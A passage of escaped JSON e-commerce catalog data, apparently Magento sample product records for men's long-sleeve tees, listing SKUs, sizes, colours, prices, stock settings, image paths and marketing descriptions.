\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms07-green_alt1.jpg,\\/m\\/s\\/ms07-green_back.jpg\",\"image\":\"\\/m\\/s\\/ms07-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms07-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms07-green_alt1.jpg,\\/m\\/s\\/ms07-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Green\"},\"558\":{\"sku\":\"MS07-XL-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Deion Long-Sleeve EverCool&trade; Tee-XL-White\",\"description\":\"<p>When you\'re training, ordinary tees don\'t cut it. That\'s why the Dion Long-Sleeve EverCool&trade; Tee features revolutionary Cocona&reg; fabric derived from a renewable resource: coconut shells. This unique material protects you from harmful UV rays, wicks away sweat, controls stink and dries quickly.<\\/p>\\n<p>&bull; Fitted. <br \\/>&bull; Contrast inner neck tape. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"deion-long-sleeve-evercool-trade-tee-xl-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms07-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms07-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms07-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms07-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms07-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"White\"},\"559\":{\"sku\":\"MS07\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Deion Long-Sleeve EverCool&trade; Tee\",\"description\":\"<p>When you\'re training, ordinary tees don\'t cut it. That\'s why the Dion Long-Sleeve EverCool&trade; Tee features revolutionary Cocona&reg; fabric derived from a renewable resource: coconut shells. This unique material protects you from harmful UV rays, wicks away sweat, controls stink and dries quickly.<\\/p>\\n<p>&bull; Fitted. <br \\/>&bull; Contrast inner neck tape. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms07-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms07-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms07-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tee,material=Cocona&reg; performance fabric|EverCool&trade;|Organic Cotton,pattern=Solid,climate=All-weather|Cool|Indoor|Warm,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MS07-XS-Black,size=XS,color=Black|sku=MS07-XS-Green,size=XS,color=Green|sku=MS07-XS-White,size=XS,color=White|sku=MS07-S-Black,size=S,color=Black|sku=MS07-S-Green,size=S,color=Green|sku=MS07-S-White,size=S,color=White|sku=MS07-M-Black,size=M,color=Black|sku=MS07-M-Green,size=M,color=Green|sku=MS07-M-White,size=M,color=White|sku=MS07-L-Black,size=L,color=Black|sku=MS07-L-Green,size=L,color=Green|sku=MS07-L-White,size=L,color=White|sku=MS07-XL-Black,size=XL,color=Black|sku=MS07-XL-Green,size=XL,color=Green|sku=MS07-XL-White,size=XL,color=White\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms07-green_alt1.jpg,\\/m\\/s\\/ms07-green_back.jpg\",\"image\":\"\\/m\\/s\\/ms07-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms07-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms07-green_alt1.jpg,\\/m\\/s\\/ms07-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tee\",\"material\":\"Cocona&reg; performance fabric|EverCool&trade;|Organic Cotton\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Cool|Indoor|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"560\":{\"sku\":\"MS08-XS-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Strike Endurance Tee-XS-Black\",\"description\":\"<p>While grit and purpose keep you going, it helps to have a little extra comfort, too. Our Strike Long-Sleeve Endurance Tee helps ensures a photo-ready finish with advanced sweat-wicking technology for a cool, dry feel.<\\/p>\\n<p>&bull; Loose fit. <br \\/>&bull; Ribbed cuffs\\/collar. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"strike-endurance-tee-xs-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms08-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms08-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms08-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms08-black_back.jpg\",\"image\":\"\\/m\\/s\\/ms08-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms08-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms08-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Black\"},\"561\":{\"sku\":\"MS08-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Strike Endurance Tee-XS-Blue\",\"description\":\"<p>While grit and purpose keep you going, it helps to have a little extra comfort, too. Our Strike Long-Sleeve Endurance Tee helps ensures a photo-ready finish with advanced sweat-wicking technology for a cool, dry feel.<\\/p>\\n<p>&bull; Loose fit. <br \\/>&bull; Ribbed cuffs\\/collar. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"strike-endurance-tee-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms08-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms08-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms08-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms08-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms08-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"562\":{\"sku\":\"MS08-XS-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Strike Endurance Tee-XS-Red\",\"description\":\"<p>While grit and purpose keep you going, it helps to have a little extra comfort, too. Our Strike Long-Sleeve Endurance Tee helps ensures a photo-ready finish with advanced sweat-wicking technology for a cool, dry feel.<\\/p>\\n<p>&bull; Loose fit. <br \\/>&bull; Ribbed cuffs\\/collar. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"strike-endurance-tee-xs-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms08-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms08-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms08-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms08-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms08-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Red\"},\"563\":{\"sku\":\"MS08-S-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Strike Endurance Tee-S-Black\",\"description\":\"<p>While grit and purpose keep you going, it helps to have a little extra comfort, too. Our Strike Long-Sleeve Endurance Tee helps ensures a photo-ready finish with advanced sweat-wicking technology for a cool, dry feel.<\\/p>\\n<p>&bull; Loose fit. <br \\/>&bull; Ribbed cuffs\\/collar. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"strike-endurance-tee-s-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms08-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms08-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms08-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms08-black_back.jpg\",\"image\":\"\\/m\\/s\\/ms08-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms08-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms08-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Black\"},\"564\":{\"sku\":\"MS08-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Strike Endurance Tee-S-Blue\",\"description\":\"<p>While grit and purpose keep you going, it helps to have a little extra comfort, too. Our Strike Long-Sleeve Endurance Tee helps ensures a photo-ready finish with advanced sweat-wicking technology for a cool, dry feel.<\\/p>\\n<p>&bull; Loose fit. <br \\/>&bull; Ribbed cuffs\\/collar. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"strike-endurance-tee-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms08-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms08-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms08-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms08-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms08-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"565\":{\"sku\":\"MS08-S-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Strike Endurance Tee-S-Red\",\"description\":\"<p>While grit and purpose keep you going, it helps to have a little extra comfort, too. Our Strike Long-Sleeve Endurance Tee helps ensures a photo-ready finish with advanced sweat-wicking technology for a cool, dry feel.<\\/p>\\n<p>&bull; Loose fit. <br \\/>&bull; Ribbed cuffs\\/collar. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"strike-endurance-tee-s-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms08-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms08-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms08-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms08-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms08-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Red\"},\"566\":{\"sku\":\"MS08-M-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Strike Endurance Tee-M-Black\",\"description\":\"<p>While grit and purpose keep you going, it helps to have a little extra comfort, too. Our Strike Long-Sleeve Endurance Tee helps ensures a photo-ready finish with advanced sweat-wicking technology for a cool, dry feel.<\\/p>\\n<p>&bull; Loose fit. <br \\/>&bull; Ribbed cuffs\\/collar. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 